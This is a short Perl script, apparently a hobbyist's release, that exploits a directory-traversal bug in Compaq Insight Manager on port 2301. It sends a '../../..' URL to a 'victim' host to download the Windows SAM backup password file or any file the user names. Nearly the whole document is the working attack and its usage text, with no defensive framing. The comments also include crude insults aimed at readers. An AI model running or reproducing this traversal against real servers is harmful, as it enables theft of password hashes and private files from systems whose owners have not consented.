#!/usr/bin/perl

# CIMcheck - Compaq Insight Manager Exploit Checker By Neon-Lenz
# --------------------------------------------------------------
# Yea i know this little script is very easy to code and lame, but
# what the hell. This should do the job. Assuming i'm still learning Perl..
# Still i'll try to do my best, and code a better script next time!
# Greets to: Acid Blades, B-r00t, KGB, ThePike and Trib.
# -Neon-Lenz. - neonlenz@nightmail.com

# Usage for Newbies "perl CIMcheck.pl www.victim.com"
# using the usage for newbies option will check for the /winnt/directory/
# and looks for the sam._ file.

#The COOL option (for experienced users)
# is like this: "perl CIMcheck.pl www.victim.com /directory_you_want/ fileyou.want"
# If you still don't get it, then that means you're a stupid dumb mother*ucker!!
# Umm pardon me...*ahum* :)

system(cls);

print "CIMcheck - Compaq Insight Manager Exploit Checker By Neon-Lenz\n";
print "--------------------------------------------------------------\n";
print "CIMcheck checks for the (in)famous Compaq Insight Manager\n";
print "root dot dot bug. To check this the remote webserver must be\n";
print "running NT and having the port 2301 open.\n";
print "This little exploit-script opens up the full vulnerable url\n";
print "and attempts to get the sam._ backup password file from the remote\n";
print "repair directory. Another cool option is that you can specify which\n";
print "file you want to download, default is the /winnt/repair/ directory and\n";
print "the sam._ backup password file. But if you assign the script like\n";
print "this: perl CIMcheck.pl www.victim.com /winnt/win.ini\n";
print "then it will attempt to get the win.ini file from the winnt directory\n";
print "So in other words specify the directory and filename like this:\n";
print "/directory/filename to attempt to download the remote file\n\n";
print "Usage: perl CIMcheck.pl www.victim.com\n\n";
print "For COOL option: perl CIMcheck.pl www.victim.com /dir_you_want/ fileyou.want\n\n";
print "For more info e-mail me at neonlenz\@nightmail.com\n";

system(pause);

$host = $ARGV[0] || "www.victim.com";

$directory = $ARGV[1] || "/winnt/repair/";

$file = $ARGV[2] || "sam._";

{
  system("explorer.exe", "http://$host:2301/../../..$directory$file");
}

#Yea, no more code, so stop reading it you jerk! ;D